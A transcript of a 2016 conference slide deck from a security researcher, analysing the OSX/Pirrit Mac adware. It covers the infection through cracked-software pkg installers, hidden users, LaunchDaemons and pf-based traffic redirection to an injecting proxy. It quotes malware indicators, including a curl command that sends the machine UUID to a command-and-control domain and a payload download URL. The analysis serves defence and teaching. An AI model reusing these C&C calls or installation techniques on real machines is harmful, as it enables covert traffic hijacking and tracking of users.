osx/pirrit: the blue balls of os x adware
TRANSCRIPT
![Page 1: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/1.jpg)
© 2016 Cybereason Inc. All rights reserved.
OSX.Pirrit: The blue balls of OS X adware
![Page 2: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/2.jpg)
© 2016 Cybereason Inc. All rights reserved.
$ whoami
• Amit Serper (What’s with the weird name, dude?)
• Lead OS X and Linux security researcher @ Cybereason• Low level research (Kernel, reversing, etc...)• Writing poorly programmed attack simulation tools (crappy coder)• Malware research• HackingTeam server research (with @awfrazer):
• Slides: http://hackedteam.lol• Paper: http://ht-paper.amit.wtf• Blogs: http://ht1.amit.wtf, http://ht2.amit.wtf
• Lead security researcher @ Israeli government agency (9 years)• <REDACTED>
• Follow me on twitter: @0xAmit
![Page 3: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/3.jpg)
© 2016 Cybereason Inc. All rights reserved.
$ cat /etc/motd
![Page 4: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/4.jpg)
© 2016 Cybereason Inc. All rights reserved.
$ cat /etc/motd
![Page 5: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/5.jpg)
© 2016 Cybereason Inc. All rights reserved.
$ cat /Users/amit/agenda.txt
This talk is based on my blog post on objective-see.com. See direct link: http://pirrit.amit.wtf
![Page 6: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/6.jpg)
© 2016 Cybereason Inc. All rights reserved.
$ cat /Users/amit/agenda.txt
1. For those that weren’t around 15 years ago: Intro to adware2. This apple is getting ripe: Adware on Mac3. The blue balls: OSX.Pirrit
![Page 7: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/7.jpg)
© 2016 Cybereason Inc. All rights reserved.
Intro to Adware
• Adware usually gets to your machine with installers.• These installers install a program that you downloaded and then offer you to
add some other program that will enhance your expirience
![Page 8: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/8.jpg)
© 2016 Cybereason Inc. All rights reserved.
Intro to Adware
1. Software that resides on one’s machine and displays ads2. Adware divide into several categories:
A. Plain and stupid – Just displays popups without any contextB. The “norm” – Displays banners (and rarely popups) according to basic
metrics that are gathered from the browserC. The black-ops operative – Installs a hidden program that can see your
entire traffic, injects ads to pages you visit and even over-rides legitimate ads that were put there in the first place (That’s stealing!)
![Page 9: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/9.jpg)
© 2016 Cybereason Inc. All rights reserved.
Adware on the Mac
1. Similar to windows, adware to OS X comes usually in the form of toolbars2. These toolbars are safari plugins – like Spigot…
http://www.thesafemac.com/arg-spigot
![Page 10: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/10.jpg)
© 2016 Cybereason Inc. All rights reserved.
Adware on the Mac
1. Similar to windows, adware to OS X comes usually in the form of toolbars2. These toolbars are safari plugins – like Spigot…3. Spigot also installs LaunchAgents!
http://www.thesafemac.com/arg-spigot
![Page 11: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/11.jpg)
© 2016 Cybereason Inc. All rights reserved.
The story begins…
• An irc user “Xiano” popped in to #osxre @ freenode and told us that his friend’s mac is acting weird
• He said that internet browsing is rather slow and some weird processes are showing up.
• He then shared with us a weird executable called “sizzling”.• Another channel member, “Paraxor” started reversing that executable and
quoted some function names
• It was immediately clear that this is some sort of adware because of these strings
![Page 12: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/12.jpg)
© 2016 Cybereason Inc. All rights reserved.
No, seriously you guys…
![Page 13: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/13.jpg)
© 2016 Cybereason Inc. All rights reserved.
Qt?
• Qt (pronounced cute) is a cross-platform application development framework• Allows a developer to maintain a single codebase for an application that will
run on Windows, Linux, Mac and other platforms…• The ”cost” of that are a lot of external libraries that are linked with your
application
![Page 14: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/14.jpg)
© 2016 Cybereason Inc. All rights reserved.
The story begins… (continued)
http://forums.macrumors.com/threads/what-is-unillumination-process-mavericks.1966015/
![Page 15: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/15.jpg)
© 2016 Cybereason Inc. All rights reserved.
![Page 16: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/16.jpg)
© 2016 Cybereason Inc. All rights reserved.
![Page 17: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/17.jpg)
© 2016 Cybereason Inc. All rights reserved.
![Page 18: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/18.jpg)
© 2016 Cybereason Inc. All rights reserved.
Let’s look at the binary (strings table)
![Page 19: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/19.jpg)
© 2016 Cybereason Inc. All rights reserved.
Another URL in the strings table
![Page 20: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/20.jpg)
© 2016 Cybereason Inc. All rights reserved.
Let’s google that url…
http://shorte.st/st/2904deaf2db062b776f39f499bf88ad9/%1
Gives 1 result to a JoeSandbox analysis of a Windows PE executable
![Page 21: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/21.jpg)
© 2016 Cybereason Inc. All rights reserved.
Shorte.st – URL shortening service
![Page 22: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/22.jpg)
© 2016 Cybereason Inc. All rights reserved.
Let’s google that…
![Page 23: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/23.jpg)
© 2016 Cybereason Inc. All rights reserved.
Let’s look at the script – rec_script.sh
![Page 24: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/24.jpg)
© 2016 Cybereason Inc. All rights reserved.
Windows is easy…
![Page 25: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/25.jpg)
© 2016 Cybereason Inc. All rights reserved.
But removal instructions for mac?
![Page 26: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/26.jpg)
© 2016 Cybereason Inc. All rights reserved.
Xiano was back with more…
• He found an app bundle called “DemoUpdater” on his friend’s machine.• He mentioned that this app bundle was running under a different user which he
did not know.• Inside the app bundle was a x64 Mach-O binary executable and a shell script
called Update2.sh.• This was far more interesting.
![Page 27: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/27.jpg)
© 2016 Cybereason Inc. All rights reserved.
In the executable - Suspicious functions and strings galore!
![Page 28: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/28.jpg)
© 2016 Cybereason Inc. All rights reserved.
Mysterious domains
*.93a555685cc7443a8e1034efa1f18924.com *.aa625d84f1587749c1ab011d6f269f7d64.com *.2ff328dcee054f2f9a9a5d7e966e3ec0.com *.aae219721390264a73aa60a5e6ab6ccc4e.com
![Page 29: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/29.jpg)
© 2016 Cybereason Inc. All rights reserved.
And also… Some more windows crap
![Page 30: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/30.jpg)
© 2016 Cybereason Inc. All rights reserved.
But what about that update2 shell script?
• When the executable finishes running, it executes Update2.sh• It’s a HUGE script (330 lines) – it even has some inline python code (python –c)
• Gets the machine uuid via command line (ioreg, parses its huge output with awk and grep)
• Sends the machine ID to a server in order to get a new ID back from the server by issuing a curl command:curl "http://93a555685cc7443a8e1034efa1f18924.com/v/cld?mid=<UUID>&ct=pd"
• It validates your geolocation by curl’ing ipinfo.io/country and checks that you are from US, UK, Spain, Australia, France, Germany, India, Italy, Netherlands or New Zealand in order to download a different “ad package”.
• It’s updating the C&C and telling it that the installation was successful, it uses the uuid as an identifier.
• After the C&C was notified, the script will download and install another program called “DemoInjector”
![Page 31: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/31.jpg)
© 2016 Cybereason Inc. All rights reserved.
So here’s what we know until now
• It’s an adware• It generates traffic • It’s cross-platform• It’s definetly trying to hide strings and domains inside the binary• It adds a hidden user with a weird name – it has to get root access• It runs weird processes with strange names• It has a componenet called “DemoUpdater”
![Page 32: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/32.jpg)
© 2016 Cybereason Inc. All rights reserved.
But here’s what no one knows
How the hell did people get infected?!
![Page 33: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/33.jpg)
© 2016 Cybereason Inc. All rights reserved.
FLASH SIDEWAYS!
![Page 34: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/34.jpg)
© 2016 Cybereason Inc. All rights reserved.
FLASH SIDEWAYS!
![Page 35: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/35.jpg)
© 2016 Cybereason Inc. All rights reserved.
PKG file?
• Mac equivalent of the MSI (Installer file)• An extensible archive format (XAR)• Has a nice wizard with useful EULA messages• Can be signed with a developer certificate• Has the ability to run pre/post install scripts!
![Page 36: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/36.jpg)
© 2016 Cybereason Inc. All rights reserved.
PKG file!
• Pkg files are a very convenient way to drop malware• You can codesign them• And you can just use the scripting features to do whatever you want to.
![Page 37: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/37.jpg)
© 2016 Cybereason Inc. All rights reserved.
PKG file – Suspicious package
http://www.mothersruin.com/software/SuspiciousPackage/
![Page 38: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/38.jpg)
© 2016 Cybereason Inc. All rights reserved.
PKG file – Suspicious package
![Page 39: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/39.jpg)
© 2016 Cybereason Inc. All rights reserved.
Let’s look at this script
![Page 40: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/40.jpg)
© 2016 Cybereason Inc. All rights reserved.
Entire process
User downloads crack Gets pkg Pre install script
runs
Script downlodas “DemoUpdater”
component
DemoUpdater prepares the
infrastructure for DemoInjector
Profit!
![Page 41: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/41.jpg)
© 2016 Cybereason Inc. All rights reserved.
DemoUpdater
• DemoUpdater is the first component that’s actually being installed by Pirrit.• This is the component that lays the groundwork for the traffic hijacking proxy• This is the script that generates the strange names
• After a random name was generated, it is being written to com.common.plist• It then creates another plist to hold its preferences. That plist is created with a
random name on each install (com.<RANDOMWORD>.preferences.plist)
![Page 42: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/42.jpg)
© 2016 Cybereason Inc. All rights reserved.
DemoUpdater
• The script then carries on with creating the DemoUpdater bundle and executable while not forgetting to change its name to make detection harder
• It then downloads the next component, DemoInjector and adding a LaunchDaemon for it.
![Page 43: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/43.jpg)
© 2016 Cybereason Inc. All rights reserved.
Wait… LaunchDaemons?
• A LaunchDaemon is an autorun in Mac speak• It loads when the computer boots• And just like everything in OS X, it’s also stored in a plist file
![Page 44: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/44.jpg)
© 2016 Cybereason Inc. All rights reserved.
The soil is ready… Now – plant the seed
• After all of the basic building blocks were layed, it is time for the main event• We have a random name generated for DemoUpdater• We have an autorun set up for DemoUpdater• Now it’s time to get the proxy and get crackin’!• The proxy is DemoInjector (remember it from before?)• It will be downloaded from:
"http://93a555685cc7443a8e1034efa1f18924.com/static/pd_files/dit3.tgz• The number in the tgz file is incremental – different version• The latest version of DemoInjector is dit8 and it is from April 10th 2016.
![Page 45: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/45.jpg)
© 2016 Cybereason Inc. All rights reserved.
The soil is ready… Now – plant the seed
• The proxy is called DemoInjector.• It is also a QT project.• It also has a lot of shell scripts!• The most interesting one is install_injector.sh• It also generates a random company name and executable name• And it creates a hidden user!
![Page 46: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/46.jpg)
© 2016 Cybereason Inc. All rights reserved.
A hidden user… Oh my!
![Page 47: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/47.jpg)
© 2016 Cybereason Inc. All rights reserved.
Hide500Users?
![Page 48: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/48.jpg)
© 2016 Cybereason Inc. All rights reserved.
Someone was reading Apple documentation
https://support.apple.com/en-il/HT203998
![Page 49: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/49.jpg)
© 2016 Cybereason Inc. All rights reserved.
Someone was reading Apple documentation
![Page 50: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/50.jpg)
© 2016 Cybereason Inc. All rights reserved.
Another LaunchDaemon, this time for DemoInjector
![Page 51: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/51.jpg)
© 2016 Cybereason Inc. All rights reserved.
And now – Traffic redirection!
• DemoInjector is listening on 127.0.0.1:9882• All of the packets that are generated by everyone but $HIDDEN_USERS are
forwarded to DemoInjector using pf• These settings also exist in another file that is dropped by the installer, called
/etc/change_net_settings. There’s also a LaunchDaemon for that!
![Page 52: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/52.jpg)
© 2016 Cybereason Inc. All rights reserved.
Aaaaand… Profit!
![Page 53: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/53.jpg)
© 2016 Cybereason Inc. All rights reserved.
Droppers… Droppers everywhere!
![Page 54: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/54.jpg)
© 2016 Cybereason Inc. All rights reserved.
I created a small removal script
http://github.com/aserperSome people had problems with it…
![Page 55: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/55.jpg)
© 2016 Cybereason Inc. All rights reserved.
Conclusion
![Page 56: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/56.jpg)
© 2016 Cybereason Inc. All rights reserved.
THANKS !
1. PATRICK WARDLE / OBJECTIVE-SEE.COM / @PATRICKWARDLE2. DATAGRAM – FOR THE AWESOME HOSPITALITY3. My pals from Cybereason for the moral support (and for picking up the check)4. @VISS5. YOU!
![Page 57: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/57.jpg)
© 2016 Cybereason Inc. All rights reserved.
THANKS !
Come see me popping shells @ fail of things right after this!
![Page 58: OSX/Pirrit: The blue balls of OS X adware](https://reader035.vdocuments.mx/reader035/viewer/2022070510/58a9a7c11a28ab9c758b4f21/html5/thumbnails/58.jpg)
© 2016 Cybereason Inc. All rights reserved.
you.Thank